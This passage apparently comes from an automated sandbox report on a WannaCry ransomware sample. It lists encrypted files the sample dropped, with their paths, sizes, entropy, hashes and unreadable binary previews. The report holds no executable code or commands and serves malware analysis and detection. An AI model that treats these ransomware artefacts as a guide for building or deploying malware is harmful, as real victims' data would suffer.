                                                  SHA-256:3B8B33479403157209DD2654DC33EDD7DD7874AEE4D24E0479B4E6E92D057014
                                                  SHA-512:1B7B6E25BE2673D29A080A4E7BDD92E56F06C79624F3051E6357CE51D013CE3531C6100002FACABD3CDD0CD9974BE67CAC5152BF009941512E4E448702D7336E
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!......l..I...?}...?.......I+(z.*.>......8....@.*..m...-...s./.?}9-."."... I...t.A7.....R...k...!1...;..u{Y..I..`..3.1J<...B...F|0.^.l... .......t(.?..>.....Q..f.3}....zC.9.GPl.X..@.d......<ZZ....`...4<....*....{{.L........}[-. ...2x\:.........R.............+..lV.IVR(..>.`l...:...{..............'\..tUk........e....}...W..L...`......@;..N......t[.........j@l|\..k...w..b{.R...D..(.+.,.....?"/.h.C.....6..3....>..:...$. .M...jH.H......n.........vL.........f.....K..S..qo=l........)...:.I....!w.>.."{.....@.......G]|.|.-].X.../.Y...l;...1~0pR#....[.....@_MT[A\...I.H.13\..>.........X'..p.B.|..._x*.....M?&N(...RL...l.F...c+.iN..A>..=e..R...}.h.4+.g..m..4..\+3vr..!...t...iL....|1a...M.%rTZ....>..O1g.U.=.........V..\.._*&.[.[G.s.]4...e......N..w.6...$)..q.Tr... ...L....$...i.2..KE..6...o]j.f...._.3..:i:...`%....w..S/.j0.....j...f. X....BrM..W.-.5rz.....H.H\u.C..6E..r.......m.H....).#....C..@..+k.K9...*w..GVO.<...[.4R..|%..K.._<M'Q>W;...sf.hF

                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_18[1].txt.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):122040
                                                  Entropy (8bit):7.998798266026306
                                                  Encrypted:true
                                                  SSDEEP:3072:IMOpYVidkf8nKDTssrWZxe6AXypoNuN1vxcwoBy0r/bgzvL5TBxc:IZpYV0kkK3FqZFpwuN5kr/szvnxc
                                                  MD5:9E228DC8C70B8D4D2A87825198B2C89E
                                                  SHA1:0F760A08E68F1F79335CB539EFEF6A7D2AB82E67
                                                  SHA-256:06578EFFF5B271D7F94291441186236C5EE20D6AE9842259F13993580E0AB4A6
                                                  SHA-512:990BE55B722E762237ADA97F369BBA8B70FF575F6979D91F9B550BEC9F247D4EFC76DA20B3D4216D87CA906EAB11101B7CAB44659C52F3C5FA93F500ECC86715
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!........<..S......c.JL.l..\N#.;..cgVN$Z.b.{x.....R..^....F.t.L...<Vg.3.......=..A}.t.1..v...}m....)......L2m.ZN.....n.J>T.z..<=PKK.....g.....bN....{$&...(K.(..[.o0.$.......@N....x$./.&...W.......~..1......0.U...(e.".!q6...(...P...0q?x..v..u.."w..............w....51*\...!9.....u.7.t..fk....M...vq....r.7.6.kD.t.<.o$J.......J..?."....../.$~G..JI.D.@!x....._..8..T.....4...r.(K..!..0.S.r|.O.....~.!..D.7..<\u.h....k....zd........+.[..........,..Z.&.Y2.z.#QSX.e.t5i...Lp.:&T..&..<n9.iHn..A.'.&\*....D$..$..F/.~2 ..ms..U...h..._......kk.....(AV.w|.Q....]2.'..7.K...]..jB...]..{....2.lR@qm...r......0.-.ae.9....$...B.....0.....7+-N...E...(l^;_........,..N.X.LT....::..e......ium...n......x.P}...8...7l.I.\..zW.9.t=..{...jd.+..[p......c|..@.GXv..:.V..y...,q....r...Y...[...`n..(.z.o=..........K..E.t....d$}...@.u.Y(...o....)&.n0.?.....Sh....c.=1=...S.(,!.q.$q$.w.(k.c.Gbh#.Y..!.fK^...n..vs...]i24.-.Tp.X..?..3....>.?..A...}.Y...bP.......P ......;.%

                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_19[1].txt.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):121496
                                                  Entropy (8bit):7.998660357706123
                                                  Encrypted:true
                                                  SSDEEP:3072:3rUS6Uqzgf2gKxJlU8ctEm1SRiZvPh8r6ffAY3HuntBr+69:3wSMEfwxjU1tEGhAuHu7+2
                                                  MD5:BA49BD89752B2C872712AC3BE47EEC73
                                                  SHA1:84DE1278D3B7B4FDF400D22DCB1CA9D8417D3FAA
                                                  SHA-256:67636A7A09C07064161E06D68B57B4B8B0B36840E916577E253330EA29937C9A
                                                  SHA-512:E1ACF23D1D8D0D5AF3256F7439B4AE2BAA51A4E00B72ED51270BEFE77B75219AF7F0D6F252B0F7D2679A98C35E40023E4F6842E49DF6CEFDCF3794E36BFC0EC3
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!.......Rs.WSV..S./../*.S#%.f.z..ME...<.>D.1....!....'T........f..=.P.f....j....."..!.0.....H!...S.9........frJ.N.... ...W.@......c..~3,..$.X..!%......1Z.;.......yV.7.....A.....E...c.d.q 8`..9..f..|.`T.IY.+..:<.(......c.%./MG)>..lz.../.WB...'.c.('u.................Q......;ATH.J..e^..4.(z..dG9.......f.8.....z..y{z_.>..G6..f.$\.,...Ml...q.S..g..M.T."...D.JyV......h....([.C.@.....3.._3^..y...Z.c"c...Q./s<......Y...R.@....(|.x.(....h.j..._.\.....u..ET....V66J...E...[...lp.............q9k(Kq..e.9..vFu..m$...~'....l......}.?..o.....o.s{...^.y.. .d=p.....{.h..4......%],M..............FV.2...q..E..^..... ...r..`......a]63.nU...3.I.5:..5j..q...-C.+.A..*X.........m........&....x......u..R.g%:.[.#.=.........'.@v....O.....q.9^>[(....A...bi.........1..q..H..e.w.9j.7.......u[.3.).q.:F..X)*.S ...y....q.f...q.( ......N.#....Z"..j.7.*.....&P...M..".........Ip^0..Y.#F'.m.d.7^*......W...r..U..y..TN....-....t........q.B..L...V\...1.i....

                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_20[1].txt.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):65784
                                                  Entropy (8bit):7.997296961858981
                                                  Encrypted:true
                                                  SSDEEP:1536:WLZm/gnFC4iV/czwR9F71sloUI4LAKjaN7BI02Kk6:WLEghiJc0P9uloUI4LAKjaB72U
                                                  MD5:A373FFACD1298403BD4B93590165A584
                                                  SHA1:84593737E386EB90A9AA5FE8C23BF8504F8EFF59
                                                  SHA-256:111D8597817A6A91C38FDD2E57F0EAE1D8C387E49B922DF34C3DE7879F3FF156
                                                  SHA-512:8320C03F00956DD685383C03E7357123086B297787ABDB2D9DE076FE86AD534C59BD4655556E4250F5B833DE9307DC0B9ACCD1775A4E95FE6683BE08858F4F5F
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!....:E{%..!iZ.......Y._ .'.T.`jY$. !.3,.....T..Q07...Tq.=.se.s......0...P......f....._..M..d.....9.N....~.F.6.......x>..0~.,.....Bh[e.._Y.^.?.......Ia9..@.S.#.e...=.h.)*.X..J....V...C.......-Cx.....&..........wB.....'xV9...,....I..O....m.'.................o.N._.v.M...;.X8..S.<vh......j..=@..K{.,\``|........%....o..,."K}.;a.>..a.tA..:x:..i..j.^q....=O.....@.......U..........xvU.....$.....x@2I/.8j.j.z.4...(b......A..Hz.b..<_.....^Y.O7....KN..=..^.e.'...AH...o...h.k...C...j.f.....N..........G.'......e$8<..W,..o..S...[S..y!%w.|....../v}.o.....h!,.I..=-.e.S...Z^.N.(.E.....d....NkF.#q.%..o..3..0..b......xYm....."...F....*.`.%M..u.".sp.....j.}..K%j....h........U...$..=.h..........5.K.GA.M....L....W.....q.Q.3ld....H.............5..i.i...2.k+ML*...y..<.}x"...h....kF.v[W.....eA....9.6..x7.5.;i..t.r.6z..R..M>0|.M..e.&'.B...{.xZ..bh.,..B9...........-....9n+..........?3J..X.........6,ds....Z...iI.P...Y...{0.H. Z1Y2.A.....M.e5..$R....

                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_21[1].txt.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):45800
                                                  Entropy (8bit):7.995937744072546
                                                  Encrypted:true
                                                  SSDEEP:768:E+gIFLUpnZ7mv45nvvLCTwhVnG1fJuFAA96:EbUC1E45Hn+AAV
                                                  MD5:40BF11A814096E7E5D234495BC5D23A6
                                                  SHA1:EA16977CA2E8D0CEB7839928C895CACD2FB0E322
                                                  SHA-256:B033FCE237DBF0F1B99E25AD3A8827033F01BF6205166D7466E216C788DA6B48
                                                  SHA-512:0D733B61D27D93612175E2610709CE24A6A4FAFA0AC4B05E08385888EF72944DE713B5F7437F3CF346129CAC461B02EF3C91907EA7FD6E0A8CC0863EAD73CE39
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!........c.&...`..%..x.;s1.u.{(#..............l.A.......B....XX.r.....z.#9..!.x......|....J..Y...r.H0)m..~...H..."......Q.....@...^@.`np_6.%N^nS.$...*.L.X,.=F......Y.Vu..j.....4-....1.[Y....o..W...Q.....;dlqYG...=W.P....#..U~.Y........ .=9../.8_C.d...........8wZ.'9..{....'G....r.kBQ.}../E.s....}N.k4.,!<h].)...=.;H...m>y._[b.X2....o.Z..r.c..Ax.g..o..{.$..W3.O!y..........}....BEG.^...S...V.F..t.5.HN.9.O..k...6Y....FJp.D....._..W.[.......aP..K..............i.....y..%......V.)..........q._K..s'.&+......E.>m..+...t...J.)`p.~....w~...\..D..e./*>.....-...[.m..i.@..V.A.Zb.!.KTL..V4....|...S....5(a._a....V4?..b?......@L.9...9....W......p |....\U.*..e.....wo..........^JI...6..&z>d..J:K.cV...:....(.".No*|....R.. ..L..[Z (.T.2><.CG..J'9<.r.......4..A...,....z RW....<un.....s...!.t...Q...I...."[...]E.a.8...W.Oo..Z.,...s\..........3N...Q....k....hW...D...<..#Q..0.QI.v.P.J2].-.l;..r.D....&T.."k...,k .g0..O.../.....f.1J..O.S..Z.s.k...t2yw.;FG6Y

                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_22[1].txt.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):202536
                                                  Entropy (8bit):7.998912684048249
                                                  Encrypted:true
                                                  SSDEEP:3072:TC98dVvGau9ze7EH66N8HeDfdb4ovF7UjMfc0n53jfmfUzDAzONjYrK21PqaM13x:TCgnJ7avhdvF4s5uUzDAzLrFG13JrX
                                                  MD5:F014E9DA54A31FB1100E3CB304A3F6DF
                                                  SHA1:892BD349F27B5E08D0DE1D139BE8214CF7A9C5C1
                                                  SHA-256:AC9FEBB3F3F3FCFC02E99EEDBE42209EDA2C317D3D0825036CABA001E99FF127
                                                  SHA-512:E6D49D57BB94294E18F105247A2AF573EDE79BE55A4430997F99512D4D0E2B8C95A6EDDFDAD2521FB3712BA85DEB11022A1C5BF6EE1CB3E30D9369D36FB3A402
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!....H.l...y.7R.P.|llIV...,.....S....BWa.f...o..\Q..}.[."r... ....*.n.R\q....l....(...-|c.;..n.8._tA...R.+.C....s!(.....9f.....r..F.....e..XDZ/\.S ....y..6...w...L\oD[...l3..t.z.B.....]........l.&...BWn..r..L.....l...&*.....U.D.B8HSDP......B..............Ht.,5.>/...[X-.f...Br.\xT.j..S..7=..oT$.......D+.9.....ko.[.,A@s...........?#..Sn.l..4j;....y..a6F.#..a...J..........I.&5.}....\.V..f.sO'VE.r._.".=....c@.C.(..Q..iwm.a.g.P..^..pY/...5.De!.vT.4.....5Fo..2.6...@.....xq...0._.+.J...k....5..]".......^M........D....3....S..)`....m'..{...^.ka......v.a5.75..@...N...l.x1*...o.]_..^..p...,.H........"....mk..TG....B......."......-SBe.... :.LD...#..'...5.2.I.1#.a;)...R.ld`.v....3^B...7.E...]#.&..L...X4...$k....!Epr..$(..Z...Gr..^......X.>;....l:.u.....q..o...Fv\R..1..+;Rg.Hu...}...B.........V.T.H..=.a5...#.O.....t..nSzi.YL...@P>...?................C5...Qf.F..Mx.=....c'.p^..*.I.(...6.4..K;...VP.s.q.,U.a.t)........1Q. 1...1Y.

                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_23[1].txt.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):16200
                                                  Entropy (8bit):7.988130625428985
                                                  Encrypted:false
                                                  SSDEEP:384:ZNUzD0/mukiAA2otagQdskOKi5hI3uyDuwmIAPCKXB0NDnY78z:TO0+uzk3pdsKi5hI3uafPLKKFnY7O
                                                  MD5:25E2613C7507A8A9222F6B431A55CBA8
                                                  SHA1:584B5D1399BB6B3823DC3D22890F2847D2F65BF7
                                                  SHA-256:A7DC0D1133B84274B5B4E0E7A270318AB853A453B383FC4F2C020257CFE62709
                                                  SHA-512:F716D68C3518487602DFBB7EF3917B2B5E45E7B7B2B995CDAD43FE4E72ADD882C56C2D9F2999E1A91EFFB0902F712B609FA44072BA86EF68C6FFF11F0DAE4C39
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.......`iy._..'..-...Md....(.<..'..FG ....R.@....K>..%...(.qC...l....w..............7..7T`.....y. ..39.A."....r..{...~....I....z....m,.<..~l'.7..G.s..I.a...."..wv.7.G.7D.'he....#.!.:.!.....^..5../.-6n.+W..A..[..5..*.r.2e.Z.h.@......v..4.O}.=......t....+>.......K...?.ut.r..xC..vP*V.........N...G...).&.......a...".g+...o6.`!k..9/....p.O8...I[ ..5V.O..-T....*...xS.....X.X2,.W...T.x.;A..Q@...1.*/....~.....kT.}.G..H)L.j.........>.._J ...Y...C+....0..cC.L;..$..5..v.tO.,O.."?..W. ....e..7+.f"!E..\.Bq.e..`g.E$..sK0#..k....=....H.VW...>8<..Z(..lc-&....>..ld....#..xT...&..{...c..0...:.=.....~.A...Ay.yf..... .$.O.G.di1XF..HN..;$7b?z6N....*jK....... .....I..........wJ%F..m,.<r4..5uG...o...B..@{G..Mb.y...m....s...>H3B...5..^...VQ.>....|f..N.C.....x.....s.u0..Z..Yj.G.s.q.G..V.4e*D.2ig.......d.j../!.x...:.....b..._.U...F(.B..Y;.k.4....K.{.~-..bjP..R..."f....+...{Cw.5p...S.X..P.2.01.h.6v.......I1.. wi.9x....:.4YFg[...~pX.D.%.cOE....=.....j..._.W.

                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_24[1].txt.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):49160
                                                  Entropy (8bit):7.9951834510139355
                                                  Encrypted:true
                                                  SSDEEP:1536:PVJz1yd1b+qeqssHmYuILxWW7aYP1vv6nhQPd:dJZXqeaHnJEW7tlvWhQPd
                                                  MD5:36CFFC1BA5BEF4B218FA9E96B35B610B
                                                  SHA1:D3C5F2D3C5DD614F05B7B866BCBB9E2BE1E21BC2
                                                  SHA-256:0CC2CA9ECC7CC786830BAE088F8E5E57BA869D27F4F9B4CA6866A2C7D94DB537
                                                  SHA-512:B4B4D0B4A9C8F0DF2299FAF1E36577DAB2A5EFDEE1184CDD41A8D434EA44D6E481404508D370AF0951E51D20ABD60AAB49826C4495E9FB65C846C721426F466E
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....T..d.:_Q-cUfw../..>....",.h.V...9......W..i-..L.j...BSE.9....Sjr<C._t..._!...1G........*..."9a.. ..d.4a%....B....m.a..u...o.a....%.)..k ...v1o....l..\L..`e....B.C.c_.'.;..J[-.Pf|.}...B..s..1.1-@1....v.. ...g9c_.7E..5..../&@.ct.@....};L.&...MR8............V.C.CR.~.su{kT...W8>.V2Z8.9Wb..C.O|..7S*P."v;4..\..t.7.G.0I.d1...r.i.6_.\....<6R}.L....k..bgyY...1...8.d..94.@F....b_<Y.....0..Z..L..W..C.Cm..C]W..............s.+..X..'..GRJ....d;1T..P.\.,RI. ~..n/.......Ynu.Y........#...&>Y.#y(V@1.v..D<q.1.....)..#5..e.T..W.DY.C...0e..<0.A8..Q_....$CW)..B'..Dv&n._:P...q&5c.. .X.$@.:..Ks8....nw...k?aG..,.......L$.b..6U-c....K[.X..W.J{.$.$Yg....@.{.5..).}q...=B.....E.....H.......H...........K...]M...../K.y M..Q..ZkDfH.e|..z.....1{...Y.cL...n..$0%.7...u.8.,....yw..>.$..u%.@^p.E<.k...'....~.1...... ..}...[....j.A}...oz...>...vpt.9J+\.Y..]........I.k.....l..oNV..{E,.cOr..g.........^...M...o...P...<..R..-5.d......%.C..q.t........3.<..f.ZS.2.k.

                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_25[1].txt.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):40328
                                                  Entropy (8bit):7.995794522066687
                                                  Encrypted:true
                                                  SSDEEP:768:DtVAfECIgto74W4Vi4cQgXKhMI65AnoKEGrmWWYKYz4M1u:DtqfEQa4/rcfXKeI65AoKtrKYLu
                                                  MD5:590CFA19229BE32C566105A52E194C1C
                                                  SHA1:2F330A1DD40191DBDE9A077B8E6093EF3EA1A6DE
                                                  SHA-256:611E3552B4E5486199BA278B489C6AEDAFEA77DBE0F08C47786E13F27BC9DBCC
                                                  SHA-512:BCFA30EA86DA24763C1813A6B6591D74D956D8060AF7C5D25C798E29A98EB5358E1D65EB1930639DA340338A82158C133A6D823BEC4FB9E2C979AE5AF11DA9F1
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!...........GT.o.zB...d.....Jk.6....K..>Y..n+.2.2b.\1L6.....EbG..rFOq&..`...r."'i.%4-....uo....~1...g.:-..z3>.0.J...../..$.+h.p..}t.....&....!J.I.6{.c...f.....1:.\n~[....^..w...A..W(....?........>.....r./+-*..3.|..O..Dy.QQ.D..5)e.0.W.K^x..tL..|..5....n...............xC.....#1...v...*z.L.....3].Y.....Duf.;.......r{.~....+......C...U|Dx..e..Y{....S.k..Te...Q....<b...V.Dk...9i..H...[..^.Ha4..L....|o......v.=1.~5...3.7c.m...n.s..D.>X.Uu.b.[..W.....ihv.....q..jo..'F.<e....4.v._....A.=.Q.@]..@.t.W#W...E8`.L.5d...IS..t......`U.x.Z.K..5H|H..s}.YY.OKH8.e....R...N.....M..................zZ.L.....3.....@1......&j.d...n.l..K.^UG.N..#....L....Yt/.o...-.R.iK.@....x.."....c|....o.P)U.$.P..6.co+..K...+.h......b....i|.........M..7.......".962.LR9.....Z6......fF,....@Z.l......h6h..Z6...(...fu..`..%.b.)\..A..S...S}..Wpt,e.K..\.x@<..;&b\.....4..y(...I.W..}a...6.....Z..g..KvC....,A...aY.u.r.LlC..[.._..h...Y$&bW..;. v^.....2.e.\;QE5)&X...uj

                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_26[1].txt.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):799560
                                                  Entropy (8bit):7.999801322075106
                                                  Encrypted:true
                                                  SSDEEP:12288:JCaUrqLcca5VSKcOO20LcZbd9/S4/MEcjsqowTx5cVS7Vr9P9bGCASL6:rUtcQTcOOFwZb//S4/MrT/xGV+XRbASu
                                                  MD5:ACE645234868B92684209AC53177A003
                                                  SHA1:62923A3B814AC1CC2EF8EC1A0374AD921A6F3C66
                                                  SHA-256:3E55A89F97C7E75FBEF61CF7A3720F04213A2FBA21DC06CAA0C495A59898DDFF
                                                  SHA-512:E7B583DAF128B195911C7EB443007300839D696C1205E0597CD07F0BDFB1816834BDB92A91B6A9D711C5DA72D70EA213671DAFD0887531167A2943C019524224
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!.......'.......P..M.[..X.gY.V..&1...b...am.w..$....@..;..+.......e...Y..$>.x&H.x...n.[..............p.`.#.||...z.qw...\..$.\.`. ..S.....?...o!L[...|..I.~~.9.(.s}..}.....'F.=...i.6`A....(W.Z.H....<_@d..yj&.h..9.w..UU&..].:...;mr.I.hiD..A..V......./2.......... ...#..C..r..b.P..J<....(;L8..d.......z..DQ.....|.K..;.....0.q.X.%..2..%G.O/..@f..W.k.n...iZ.>"..U.9.h.'.r.+.@.0.....x;.q...-..6..2......ll.......iqG..dG.._JD.[>."..c-........$.F.6].#.z....F.&I!.~0S.....g...@.<9.>.wN..P..e,r..f/.k~.A....\A{s......t..e.q.(8.h74......77.C.....i.7@.l..r...{p...]5.ak....u...g.\....R..U..{P.....`...1.|..v...@......l.}o..._.\.Es......v}...:.:-....W....h.=...2'V..T.....D...sL.......X..8k.g*..5.y.D^.+.!LH.........u.X.{ {==i.8.D..P.2 .)....]6>..,0.i..M../..........`.e.h.I'..w.C.e..H4....}...2d.v.E.'..7.O..H..d.G.....U...dr..............J.'.......(.8L..\.(9nuk.KAO ..,.........)D.v.d.._y..M..(@..(G.[%....C.....J....#-..F...V._.....[nG.V..t.E..

                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_27[1].txt.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):89144
                                                  Entropy (8bit):7.9979869212743875
                                                  Encrypted:true
                                                  SSDEEP:1536:kzI01h6SLVlIYEiE1yupmR0pBedYLLoLPpUJ08usXDZ+hWkApFl/1GVn2:k51h6Ilte4MqcBedsMVb8u2DZ+hYl/1t
                                                  MD5:D2FCB7E7B5E31F2CE7F28255BD674277
                                                  SHA1:E97B478E324B0F595409B0F0C24407FFC039D58F
                                                  SHA-256:4CB6E2A811157C2F7C4124FD796156A622D9D8CF468D144D447A7DA588317593
                                                  SHA-512:223658B44F57337848417140C5B1EB92B53AF6FF4078ADAEACD54FC2A2D1C16F14FFF1248E723AB37FA02066FE94C0ACC8280C1400B62D0694C3E7F2A335C7F2
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!....p>F......_.V:...&.f......61....s..}.. ...2....L.L....^.?..0^,.z......A.Kl..[\'.&VKmA..k..i..!.=....B...Y.2.y...@.J....,.<.+A[..8...V...Q.2........k.P..w.;u.........0Nv-6...X....E......L(..O......<...f4.DNlK&...Nm'k.F(-7.m..<c_L.....8.|V.... [.......e6..dO.i..C.Z..lJ.6lOt.5.E.%.....i\..+.,}P..<..h..g....yx.3.?...5...s...N(.b".a...f..._V...fkP..y..M=.&0..PPw.oN[.!..X...#.3..E(f.= ....O..l...\...;U.YkE.#bN).*....a.....u....|..&....1.Q.@.x...`..D.PL......C..@0v]G...dh#.M..*.X+(...6a.>..Gl...y.....pr.......D..f..$.d.KM.j.....:.......Wc..j.H#.:b.%&@....hF..&.....u?.....!...k...s...G......8@.Y.[......$....y.a... .`/....2..m+.gS.W...l....k..P.@..Z.}...>..,..]..b.Z^..|....w>.r.z.C/.ll05N..f..f...;N....A..*......u..t..u.O.`.h..:#..T,.V";.'{.Sgn:.../..H........P.../.&.N..w.....x....T..%.E........_....n<0(.L." #.R{..bUA...W{(....eG..k^.....w.ci...4..~..`K....f.(@.<... .DW.)..R.:...0.;r.......L~...N.&......`r..........t...U!...T2j

                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_28[1].txt.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):186072
                                                  Entropy (8bit):7.999028499215018
                                                  Encrypted:true
                                                  SSDEEP:3072:lZLkRjE7WsqJjRg3HiB5QnLX2/TkbHKz8E9WiNSoura+YRd8m/frWeepXT:PkRI7bG22uLb2BI6S9u+YvZjWvpj
                                                  MD5:E8DCF4B5B4F70219BF61495B5CAC1A17
                                                  SHA1:307A7F5585E3CE6555743FF98E2FC460405A4B73
                                                  SHA-256:4F386E5DB4608C5DF292B2AFD989D289A6FA01CFC1F2E63FCA499FFC5047E7F6
                                                  SHA-512:0E484EFCA400AFEB3562C9328A881D214A88B749951622B586969C65B4F2B6B0CAE8B203C9494712653581883B0E5FC5CAAA4D5A1E4579A01DFABC93C83EE26D
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!....C....%..$b.......".....l.I>.V.z.;..gl.|.0n.QU.......$..(..v....[.Bu*...I.U.#....D....i..p.....w........2h.q..)..Q.......A......F4..0.Pw..k....A....j...j.t......I....2ix...YY..T....&..u..w....H...~....ns7..>Y.(EO.......,.....wz/.fe.=..F.p..3g..................F.?j).sA.cR#..H...x..q..i.pt...r.....T`..}.=.....Ngx.C.u.z.b.........d...G..........0....../)....#.`.g..... ."*...J..o...U2.:U.. .>.x.\vD.C.....`...W.....6.d-l.Vr..X...o.m]/J_0^#.l.+}.k3.rSv.H MV..4.y.(...Z..J.0....p.:7*4R}.(U.d..O..8...%....8A.i..e...p.....|q6......_~.&.n.%%.E.....'..w.....&hpY.E...f/Yvbl..+............. .D%......k.v..lK$...g. .raWF... ../y.!....H$.J..C..B...2...t.......Y......<..R.....&.z".......|t..N..zJ...O[.!....N.om...c..$L*8.^(...Ax..&...E.Z.............e..*..t....os...;.w&#[C.5..(A...:K..1.}&l.t;.W.e..H......-<....^jA..db....`,.nL.x.p..%......T,...!S..JoK.W%W..^z.#1...f..H.....jN..j...0.a+.....O3..~....X#f.S4.l1...)....i..9......&lT...i3.Iw....c%.p

                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_29[1].txt.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):17736
                                                  Entropy (8bit):7.990090811555969
                                                  Encrypted:true
                                                  SSDEEP:384:JZ4SHU1x8fVuZJBZQO4V7lCBKe+Dv8M+VOfKNgthQQnMwoovQaZIPqUf:cCwmNuZHZQLV7UKjDv8M+VOSNgtKhaZw
                                                  MD5:19D40551A46E9ACC2E89E3347C5B3D33
                                                  SHA1:2BF67FEB52EC6515D1106D976FA92EF4917C93AB
                                                  SHA-256:7C7DCEA700096ED1074AC023A30B97407114A5885A476DCD2E43E1817899828F
                                                  SHA-512:8E6E51D72EF29F5CD97625888864D56C4129502956BC9BD5CC28BD8388A3AFCDD168650B6D621C17BA9904DC864C31FFC60538539145EABEA49952257283A146
                                                  Malicious:true
                                                  Reputation:unknown
